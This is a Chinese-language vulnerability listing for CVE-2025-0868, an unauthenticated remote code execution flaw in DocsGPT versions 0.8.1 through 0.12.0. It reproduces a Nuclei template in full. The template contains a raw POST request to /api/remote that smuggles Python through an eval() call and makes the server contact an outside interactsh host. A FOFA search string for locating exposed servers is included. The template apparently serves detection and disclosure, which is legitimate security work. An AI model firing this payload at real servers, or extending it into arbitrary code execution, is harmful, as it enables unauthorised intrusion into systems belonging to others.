CVE-2025-0868: DocsGPT - Unauthenticated Remote Code Execution

日期: 2025-08-01 | 影响软件: DocsGPT | POC: 已公开

漏洞描述

A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.

PoC代码[已公开]

id: CVE-2025-0868

info:
  name: DocsGPT - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.
  reference:
    - https://cert.pl/posts/2025/02/CVE-2025-0868/
    - https://cert.pl/en/posts/2025/02/CVE-2025-0868/
    - https://github.com/arc53/DocsGPT
  classification:
    epss-score: 0.11125
    epss-percentile: 0.93205
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Welcome to DocsGPT"
  tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln

http:
  - raw:
      - |
        POST /api/remote HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\\\":__import__('requests').get('http://{{interactsh-url}}/')}#":11}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '"task_id":'
          - '"status":'
        condition: and
# digest: 4a0a004730450221008b3cc0be9a75a0a10551e3298908c4129a909e6b5881fb142aae186ceeaec44902204cb282cc34cafabc3f4344ab58e810171e804a684d43fd844b172067080f87b1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐